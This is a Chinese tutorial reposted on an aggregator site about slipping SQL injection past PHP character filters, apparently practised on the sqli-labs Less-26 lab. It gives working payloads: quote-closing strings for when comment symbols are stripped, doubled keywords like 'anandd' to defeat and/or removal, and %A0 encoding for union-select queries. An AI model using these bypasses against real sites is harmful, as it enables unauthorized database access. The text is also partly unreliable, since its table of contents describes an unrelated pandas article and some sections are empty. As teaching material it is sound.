SQL注入---字符绕过-Toy模板网

这篇具有很好参考价值的文章主要介绍了SQL注入---字符绕过。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

文章目录

前言
一、pandas是什么？
二、使用步骤
- 1.引入库
- 2.读入数据
总结

一.注释符绕过

当网页源代码中出现如下代码后，常见的注释符号将无效，因此需要通过特殊手段进行绕过

$reg = "/#/";
$reg1 = "/--/";
$replace = "";
#若id中提取出的字符中包含reg（#）类型的特殊符号将会被replace类型的符号（空）替换
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

上述代码中无法使用符号（#）或（--+）将后面的sql语句注释，因此需要通过特殊手段将后面多出的单引号闭合

演示案例：

单引号闭合：？id=1' and 1=1 ' 括号单引号：？id=1') and 1=1( '

双引号闭合：？id=1'' and 1=1''

$sql="SELECT * FROM users WHERE id='id=1' and 1=1 '' LIMIT 0,1";

二.and 和 or 过滤绕过

过滤源代码

function blacklist($id)
{
#若提取的id中包含or字符，将or替换为空
	$id= preg_replace('/or/i',"", $id);			
	$id= preg_replace('/AND/i',"", $id);		
	
	return $id;
}

注：i:代表无论or/and 是大写还是小写统一转译为小写

绕过手法

复写过滤字符
?id=1' anandd 1=1--+

三.空格过滤绕过

过滤代码：

$id= blacklist($id);
$hint=$id;

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			
	$id= preg_replace('/and/i',"", $id);		
	$id= preg_replace('/[\/\*]/',"", $id);		
	$id= preg_replace('/[--]/',"", $id);		
	$id= preg_replace('/[#]/',"", $id);			
	$id= preg_replace('/[\s]/',"", $id);		
	$id= preg_replace('/[\/\\\\]/',"", $id);		
	return $id;
}

绕过手法：

SQL注入---字符绕过,网络安全攻击,sql,java,前端

在不同的环境中能够绕过的URL编码有所不同，因此需要多次尝试。

演示案例：

未使用URL编码注入前：符号被过滤

http://192.168.100.10/sql/Less-26/index.php?id=1' union select 1,2,3--+;

SQL注入---字符绕过,网络安全攻击,sql,java,前端

SQL注入---字符绕过,网络安全攻击,sql,java,前端 使用URL注入编码后

http://192.168.100.10/sql/Less-26/index.php?id=1%A0union%A0select 1,2,3--+;

SQL注入---字符绕过,网络安全攻击,sql,java,前端

报错注入：

SQL注入---字符绕过,网络安全攻击,sql,java,前端文章来源地址https://www.toymoban.com/news/detail-847559.html

四.逗号过滤绕过

总结

到了这里，关于SQL注入---字符绕过的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

SQL注入---字符绕过

文章目录

一.注释符绕过

二.and 和 or 过滤绕过

三.空格过滤绕过

四.逗号过滤绕过

总结

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

支付宝扫一扫领取红包，优惠每天领

二维码1

二维码2